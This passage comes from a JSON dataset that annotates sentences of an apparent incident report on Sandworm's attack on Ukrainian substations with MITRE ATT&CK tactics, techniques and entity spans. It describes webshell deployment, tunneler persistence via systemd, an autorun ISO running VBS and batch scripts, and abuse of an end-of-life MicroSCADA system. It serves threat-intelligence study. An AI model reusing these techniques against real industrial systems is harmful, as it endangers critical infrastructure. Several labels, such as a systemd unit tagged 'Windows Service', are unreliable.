"source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "However, we note that the wiper deployment was limited to the victim’s IT environment and did not impact the hypervisor or the SCADA virtual machine.", "sentence_text": "This is unusual since the threat actor had removed other forensic artifacts from the SCADA system in a possible attempt to cover their tracks, which would have been enhanced by the wiper activity.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "removed forensic artifacts from the SCADA system to cover tracks", "entities": [ { "text": " threat actor ", "start": 25, "end": 39, "label": "ThreatActor" }, { "text": "SCADA system", "start": 85, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "removed other forensic artifacts from the SCADA system in a possible attempt to cover their tracks", "start": 43, "end": 141, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s23-3e219f", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "This is unusual since the threat actor had removed other forensic artifacts from the SCADA system in a possible attempt to cover their tracks, which would have been enhanced by the wiper activity.", "sentence_text": "This could indicate a lack of coordination across different individuals or operational subteams involved in the attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s24-23af55", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "This could indicate a lack of coordination across different individuals or operational subteams involved in the attack.", "sentence_text": "A deeper dive on the attack lifecycle and OT capability can be found in the Technical Analysis section of the blog post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s25-37e233", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "A deeper dive on the attack lifecycle and OT capability can be found in the Technical Analysis section of the blog post.", "sentence_text": "Sandworm’s Threat Activity Reveals Insights into Russia’s Offensive Cyber Capabilities Sandworm’s substation attack reveals notable insights into Russia’s continued investment in OT-oriented offensive cyber capabilities and overall approach to attacking OT systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s26-b56273", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Sandworm’s Threat Activity Reveals Insights into Russia’s Offensive Cyber Capabilities Sandworm’s substation attack reveals notable insights into Russia’s continued investment in OT-oriented offensive cyber capabilities and overall approach to attacking OT systems.", "sentence_text": "This incident and last year’s INDUSTROYER.V2 incident both show efforts to streamline OT attack capabilities through simplified deployment features.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s27-efb5d3", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "This incident and last year’s INDUSTROYER.V2 incident both show efforts to streamline OT attack capabilities through simplified deployment features.", "sentence_text": "We observed the same efforts in our analysis of a series of documents detailing project requirements to enhance Russian offensive cyber capabilities Similarly, the evolution of suspected GRU-sponsored OT attacks shows a decrease in the scope of disruptive activities per attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s28-6e3c75", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "We observed the same efforts in our analysis of a series of documents detailing project requirements to enhance Russian offensive cyber capabilities Similarly, the evolution of suspected GRU-sponsored OT attacks shows a decrease in the scope of disruptive activities per attack.", "sentence_text": "By comparison, the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s29-4a49b8", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "By comparison, the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER.", "sentence_text": "While this shift likely reflects the increased tempo of wartime cyber operations, it also reveals the GRU’s priority objectives in OT attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s30-2687c5", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "While this shift likely reflects the increased tempo of wartime cyber operations, it also reveals the GRU’s priority objectives in OT attacks.", "sentence_text": "Sandworm’s use of a native Living off the Land binary (LotLBin)\nto disrupt an OT environment shows a significant shift in techniques.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "used a native LotL binary to disrupt the OT environment", "entities": [ { "text": "Sandworm’s", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "ative Living off the Land binary (LotLBin)", "start": 21, "end": 63, "label": "Action" }, { "text": "OT environment", "start": 78, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "use of a native Living off the Land binary (LotLBin)\nto disrupt an OT environment", "start": 11, "end": 92, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s31-fc8282", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "Sandworm’s use of a native Living off the Land binary (LotLBin)\nto disrupt an OT environment shows a significant shift in techniques.", "sentence_text": "Using tools that are more lightweight and generic than those observed in prior OT incidents, the actor likely decreased the time and resources required to conduct a cyber physical attack.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "used lightweight, generic tools to conduct a cyber physical attack", "entities": [ { "text": "the actor ", "start": 93, "end": 103, "label": "ThreatActor" }, { "text": "tools that are more lightweight and generic", "start": 6, "end": 49, "label": "MalwareTool" }, { "text": "Using tools that are more lightweight and generic", "start": 0, "end": 49, "label": "Action" }, { "text": "conduct a cyber physical attack", "start": 155, "end": 186, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s32-6296a3", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Using tools that are more lightweight and generic than those observed in prior OT incidents, the actor likely decreased the time and resources required to conduct a cyber physical attack.", "sentence_text": "LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments, but also for modifications to files already present within their installed OT applications and services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s33-2a5fc7", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments, but also for modifications to files already present within their installed OT applications and services.", "sentence_text": "As outlined in recent research detailing the GRU's disruptive playbook , we have observed Sandworm adopting LotL tactics across its wider operations to similarly increase the speed and scale at which it can operate while minimizing the odds of detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "adopted Lotl tactics to operate faster and evade detection", "entities": [ { "text": "GRU's disruptive", "start": 45, "end": 61, "label": "ThreatActor" }, { "text": "Sandworm", "start": 90, "end": 98, "label": "ThreatActor" }, { "text": "LotL tactics", "start": 108, "end": 120, "label": "MalwareTool" }, { "text": "dopting LotL tactics across its wider operations", "start": 100, "end": 148, "label": "Action" }, { "text": "increase the speed and scale", "start": 162, "end": 190, "label": "Action" }, { "text": "minimizing the odds of detection.", "start": 221, "end": 254, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s34-e64c2f", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "As outlined in recent research detailing the GRU's disruptive playbook , we have observed Sandworm adopting LotL tactics across its wider operations to similarly increase the speed and scale at which it can operate while minimizing the odds of detection.", "sentence_text": "While we lack sufficient evidence to assess a possible link, we note that the timing of the attack overlaps with Russian kinetic operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s35-f7cc2b", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "While we lack sufficient evidence to assess a possible link, we note that the timing of the attack overlaps with Russian kinetic operations.", "sentence_text": "Sandworm potentially developed the disruptive capability as early as three weeks prior to the OT event, suggesting the attacker may have been waiting for a specific moment to deploy the capability.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "developed a disruptive capability weeks before deployment", "entities": [ { "text": "Sandworm ", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "attacker", "start": 119, "end": 127, "label": "ThreatActor" }, { "text": "disruptive capability", "start": 35, "end": 56, "label": "MalwareTool" }, { "text": "OT event,", "start": 94, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "developed the disruptive capabilit", "start": 21, "end": 55, "label": "Action" }, { "text": "waiting for a specific moment to deploy the capability", "start": 142, "end": 196, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s36-200d72", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Sandworm potentially developed the disruptive capability as early as three weeks prior to the OT event, suggesting the attacker may have been waiting for a specific moment to deploy the capability.", "sentence_text": "The eventual execution of the attack coincided with the start of a multi-day set of coordinated missile strikes on critical infrastructure across several Ukrainian cities, including the city in which the victim was located.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s37-8f3972", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "The eventual execution of the attack coincided with the start of a multi-day set of coordinated missile strikes on critical infrastructure across several Ukrainian cities, including the city in which the victim was located.", "sentence_text": "Outlook\nThis attack represents an immediate threat to Ukrainian critical infrastructure environments leveraging the MicroSCADA supervisory control system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s38-09e9b0", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Outlook\nThis attack represents an immediate threat to Ukrainian critical infrastructure environments leveraging the MicroSCADA supervisory control system.", "sentence_text": "Furthermore, our analysis of the activity suggests Russia would be capable of developing similar capabilities against other SCADA systems and programming languages beyond MicroSCADA and SCIL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s39-0b38d1", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "Furthermore, our analysis of the activity suggests Russia would be capable of developing similar capabilities against other SCADA systems and programming languages beyond MicroSCADA and SCIL.", "sentence_text": "We urge asset owners to review and implement the following recommendations to mitigate and detect this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s40-c4c16c", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "We urge asset owners to review and implement the following recommendations to mitigate and detect this activity.", "sentence_text": "Acknowledgements\nThis research was made possible thanks to the hard work of many people not listed on the byline.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s41-7dc932", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Acknowledgements\nThis research was made possible thanks to the hard work of many people not listed on the byline.", "sentence_text": "This incident response engagement was funded through the UK’s Ukraine Cyber Programme (cross-government Conflict, Stability and Security Fund) and delivered by the United Kingdom’s Foreign, Commonwealth and Development Office.\nTechnical Analysis: Sandworm Attack Against Ukrainian Substations Initial Compromise and Maintaining Presence At this time, it is unknown how Sandworm gained initial access to the victim.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s42-8ca1d1", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "This incident response engagement was funded through the UK’s Ukraine Cyber Programme (cross-government Conflict, Stability and Security Fund) and delivered by the United Kingdom’s Foreign, Commonwealth and Development Office.\nTechnical Analysis: Sandworm Attack Against Ukrainian Substations Initial Compromise and Maintaining Presence At this time, it is unknown how Sandworm gained initial access to the victim.", "sentence_text": "Sandworm was first observed in the victim’s environment in June 2022, when the actor deployed the Neo-REGEORG webshell on an internet-facing server.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "deployed the Neo-REGEORG webshell on internet facing server", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "actor ", "start": 79, "end": 85, "label": "ThreatActor" }, { "text": " Neo-REGEORG webshell ", "start": 97, "end": 119, "label": "MalwareTool" }, { "text": "internet-facing server", "start": 125, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "deployed the Neo-REGEORG webshell on an internet-facing server", "start": 85, "end": 147, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s43-98dde5", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "Sandworm was first observed in the victim’s environment in June 2022, when the actor deployed the Neo-REGEORG webshell on an internet-facing server.", "sentence_text": "This is consistent with the group’s prior activity scanning and exploiting internet facing servers for initial access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Scanning and exploiting internet facing servers for initial access", "entities": [ { "text": "the group’", "start": 24, "end": 34, "label": "ThreatActor" }, { "text": "internet facing servers", "start": 75, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "scanning and exploiting internet facing servers for initial access", "start": 51, "end": 117, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s44-57381b", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "This is consistent with the group’s prior activity scanning and exploiting internet facing servers for initial access.", "sentence_text": "Roughly one month later, Sandworm deployed GOGETTER, which is a tunneler written in Golang that proxies communications for its command and control (C2) server using the open-source library Yamux over TLS.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.002", "name": "External Proxy" } ], "procedure": "deployed the GOGETTER tunneling tool to proxy C2 coomunications", "entities": [ { "text": " Sandworm", "start": 24, "end": 33, "label": "ThreatActor" }, { "text": "GOGETTER", "start": 43, "end": 51, "label": "MalwareTool" }, { "text": "tunneler written in Golang ", "start": 64, "end": 91, "label": "MalwareTool" }, { "text": "open-source library Yamux ", "start": 169, "end": 195, "label": "Infrastructure_Indicator" }, { "text": " command and control (C2) server ", "start": 126, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "deployed GOGETTER", "start": 34, "end": 51, "label": "Action" }, { "text": "proxies communications for its command and control (C2) server ", "start": 96, "end": 159, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s45-2db34f", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "Roughly one month later, Sandworm deployed GOGETTER, which is a tunneler written in Golang that proxies communications for its command and control (C2) server using the open-source library Yamux over TLS.", "sentence_text": "When leveraging GOGETTER, Sandworm utilized a Systemd service unit to maintain persistence on systems.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "used a system service unit to maintain persistence", "entities": [ { "text": "Sandworm", "start": 26, "end": 34, "label": "ThreatActor" }, { "text": "GOGETTER", "start": 16, "end": 24, "label": "MalwareTool" }, { "text": "utilized a Systemd service unit to maintain persistence on systems", "start": 35, "end": 101, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s46-100f6e", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "When leveraging GOGETTER, Sandworm utilized a Systemd service unit to maintain persistence on systems.", "sentence_text": "The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "used a Systemd configuration file to maintain persistence", "entities": [ { "text": " Sandworm", "start": 43, "end": 52, "label": "ThreatActor" }, { "text": "The Systemd configuration file", "start": 0, "end": 30, "label": "MalwareTool" }, { "text": "maintain persistence", "start": 74, "end": 94, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s47-9df942", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems.", "sentence_text": "The value “WantedBy” defines when the program should be run; in the configuration used by Sandworm, the setting “multi-user.target” means that the program will be run when the host has reached a state when it will accept users logging on, for example after successful power on.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Configure systemd service to execute program automatically at system startup to maintain persistence.", "entities": [ { "text": "configuration used by Sandworm", "start": 68, "end": 98, "label": "Action" }, { "text": "multi-user.target", "start": 113, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-83_mitre_report-p1-s48-e06036", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "The value “WantedBy” defines when the program should be run; in the configuration used by Sandworm, the setting “multi-user.target” means that the program will be run when the host has reached a state when it will accept users logging on, for example after successful power on.", "sentence_text": "This enables GOGETTER to maintain persistence across reboots.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s49-59b152", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "This enables GOGETTER to maintain persistence across reboots.", "sentence_text": "The “ExecStart” value specifies the path of the program to be run, which in this case was GOGETTER.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "configured systemd service to execute GOGETTER", "entities": [ { "text": "GOGETTER", "start": 90, "end": 98, "label": "MalwareTool" }, { "text": "ExecStart”", "start": 5, "end": 15, "label": "MalwareTool" }, { "text": "specifies the path of the program to be run", "start": 22, "end": 65, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-83_mitre_report-p1-s50-0a6336", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "The “ExecStart” value specifies the path of the program to be run, which in this case was GOGETTER.", "sentence_text": "When deploying GOGETTER, Mandiant observed Sandworm leverage Systemd service units designed to masquerade as legitimate or seemingly legitimate services.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Sandworm leveraged Systemd service units to masquerade as legitimate services during GOGETTER deployment.", "entities": [ { "text": "GOGETTER", "start": 15, "end": 23, "label": "MalwareTool" }, { "text": "Sandworm", "start": 43, "end": 51, "label": "ThreatActor" }, { "text": "Systemd service units", "start": 61, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "leverage Systemd service units designed to masquerade as legitimate or seemingly legitimate services", "start": 52, "end": 152, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s51-d683ac", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "When deploying GOGETTER, Mandiant observed Sandworm leverage Systemd service units designed to masquerade as legitimate or seemingly legitimate services.", "sentence_text": "Lateral Movement to SCADA Hypervisor and OT Attack Execution Sandworm utilized a novel technique to impact the OT environment by executing code within an End-of-Life (EOL) MicroSCADA control system and issuing commands that impacted the victim’s connected substations.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "executed code in an EOL microSCADA system and issued commands impacting connected substations", "entities": [ { "text": "Sandworm ", "start": 61, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "novel technique", "start": 81, "end": 96, "label": "MalwareTool" }, { "text": "End-of-Life (EOL) MicroSCADA control system", "start": 154, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "victim’s connected substations", "start": 237, "end": 267, "label": "Infrastructure_Indicator" }, { "text": " executing code ", "start": 128, "end": 144, "label": "Action" }, { "text": "utilized a novel technique", "start": 70, "end": 96, "label": "Action" }, { "text": "impact the OT environment", "start": 100, "end": 125, "label": "Action" }, { "text": " issuing commands that impacted the victim’s connected substations", "start": 201, "end": 267, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s52-1d8c9b", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "Lateral Movement to SCADA Hypervisor and OT Attack Execution Sandworm utilized a novel technique to impact the OT environment by executing code within an End-of-Life (EOL) MicroSCADA control system and issuing commands that impacted the victim’s connected substations.", "sentence_text": "We note that given the attacker’s use of anti-forensics techniques, we were not able to recover all the artifacts from the intrusion.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "attacker used anti forensics techniques resulting in incomplete recovery of artifacts from the intrusion", "entities": [ { "text": "attacker’", "start": 23, "end": 32, "label": "ThreatActor" }, { "text": "anti-forensics techniques", "start": 41, "end": 66, "label": "MalwareTool" }, { "text": "use of anti-forensics techniques", "start": 34, "end": 66, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s53-8d4122", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "We note that given the attacker’s use of anti-forensics techniques, we were not able to recover all the artifacts from the intrusion.", "sentence_text": "To impact the OT systems, Sandworm accessed the hypervisor that hosted a SCADA management instance for the victim’s substation environment and leveraged an ISO image named \"a.iso\" as a virtual CD-ROM.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Accessed the hypervisor hosting SCADA management and used an ISO image as a virtual CD-ROM to impact OT systems", "entities": [ { "text": "Sandworm", "start": 26, "end": 34, "label": "ThreatActor" }, { "text": "ISO image named \"a.iso\"", "start": 156, "end": 179, "label": "MalwareTool" }, { "text": "virtual CD-ROM", "start": 185, "end": 199, "label": "MalwareTool" }, { "text": " hypervisor that hosted a SCADA management instance for the victim’s substation environment", "start": 47, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "impact the OT systems,", "start": 3, "end": 25, "label": "Action" }, { "text": "accessed the hypervisor that hosted a SCADA management instance for the victim’s substation environment", "start": 35, "end": 138, "label": "Action" }, { "text": "leveraged an ISO image named \"a.iso\" as a virtual CD-ROM", "start": 143, "end": 199, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s54-35fb2b", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "To impact the OT systems, Sandworm accessed the hypervisor that hosted a SCADA management instance for the victim’s substation environment and leveraged an ISO image named \"a.iso\" as a virtual CD-ROM.", "sentence_text": "The system was configured to permit inserted CD-ROMs to autorun.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "system was configured to permit inserted CO-ROMs to autorun", "entities": [ { "text": "The system", "start": 0, "end": 10, "label": "Infrastructure_Indicator" }, { "text": "permit inserted CD-ROMs to autorun", "start": 29, "end": 63, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s55-400152", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "The system was configured to permit inserted CD-ROMs to autorun.", "sentence_text": "The ISO file, at minimum, contained the following files: \"lun.vbs\" and \"n.bat\" as both files are referenced within the D volume and therefore contained within “a.iso”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "ISO file contained VBS and batch scripts for execution", "entities": [ { "text": "ISO file", "start": 4, "end": 12, "label": "MalwareTool" }, { "text": "lun.vbs", "start": 58, "end": 65, "label": "MalwareTool" }, { "text": "n.bat", "start": 72, "end": 77, "label": "MalwareTool" }, { "text": "a.iso", "start": 160, "end": 165, "label": "MalwareTool" }, { "text": " D volume", "start": 118, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "contained within “a.iso”", "start": 142, "end": 166, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s56-8a3eb2", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "The ISO file, at minimum, contained the following files: \"lun.vbs\" and \"n.bat\" as both files are referenced within the D volume and therefore contained within “a.iso”.", "sentence_text": "The inserted ISO led to at least the following command lines execution:\nwscript.exe \"d:\\pack\\lun.vbs\"\ncmd /c \"D:\\pack\\n.bat\" Based on forensic analysis, we believe “lun.vbs” contents are the following (Figure 6):\nThe contents in Figure 6 indicate that “lun.vbs” executes “n.bat”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.005", "name": "Visual Basic" } ], "procedure": "execution invloved wscript.exe launching lun.vbs, which executes n.bat via cmd/c", "entities": [ { "text": " ISO", "start": 12, "end": 16, "label": "MalwareTool" }, { "text": "lun.vbs", "start": 165, "end": 172, "label": "MalwareTool" }, { "text": "n.bat", "start": 272, "end": 277, "label": "MalwareTool" }, { "text": "D:\\pack\\n.bat", "start": 110, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "d:\\pack\\lun.vbs", "start": 85, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "wscript.exe \"d:\\pack\\lun.vbs", "start": 72, "end": 100, "label": "Action" }, { "text": "“lun.vbs” executes “n.bat”", "start": 252, "end": 278, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s57-01999f", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "The inserted ISO led to at least the following command lines execution:\nwscript.exe \"d:\\pack\\lun.vbs\"\ncmd /c \"D:\\pack\\n.bat\" Based on forensic analysis, we believe “lun.vbs” contents are the following (Figure 6):\nThe contents in Figure 6 indicate that “lun.vbs” executes “n.bat”.", "sentence_text": "Additional fragments recovered include text consistent with Windows command line execution (Figure 7).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "evidence of Windows command line execution was recovered", "entities": [ { "text": "Windows command line", "start": 60, "end": 80, "label": "MalwareTool" } ] }, { "uid": "mitre-83_mitre_report-p1-s58-e656ff", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "Additional fragments recovered include text consistent with Windows command line execution (Figure 7).", "sentence_text": "This fragment was identified by analyzing images from the host.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s59-f0eb20", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "This fragment was identified by analyzing images from the host.", "sentence_text": "Reconstruction of the host’s anti-virus logs indicates “lun.vbs” and “n.bat” were executed in close time proximity.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.005", "name": "Visual Basic" } ], "procedure": "executed VBS and batch scripts in close succession", "entities": [ { "text": "un.vbs", "start": 57, "end": 63, "label": "MalwareTool" }, { "text": "n.bat", "start": 70, "end": 75, "label": "MalwareTool" }, { "text": "host’s anti-virus logs", "start": 22, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "executed in close time proximity.", "start": 82, "end": 115, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s60-77037e", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "Reconstruction of the host’s anti-virus logs indicates “lun.vbs” and “n.bat” were executed in close time proximity.", "sentence_text": "Because of this and the reference to the attacker’s ISO folder path, we believe that the command fragment in Figure 7 is likely the contents of “n.bat”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s61-d32a98", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "Because of this and the reference to the attacker’s ISO folder path, we believe that the command fragment in Figure 7 is likely the contents of “n.bat”.", "sentence_text": "The syntax of the command fragment includes “scilc.exe”, a native utility that is part of the MicroSCADA software suite.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s62-2790ef", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "The syntax of the command fragment includes “scilc.exe”, a native utility that is part of the MicroSCADA software suite.", "sentence_text": "The impacted MicroSCADA system was running an EOL software version that allowed default access to the SCIL-API.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploited default access in EOL MicroSCADA software", "entities": [ { "text": "MicroSCADA system ", "start": 13, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "SCIL-API", "start": 102, "end": 110, "label": "Infrastructure_Indicator" }, { "text": 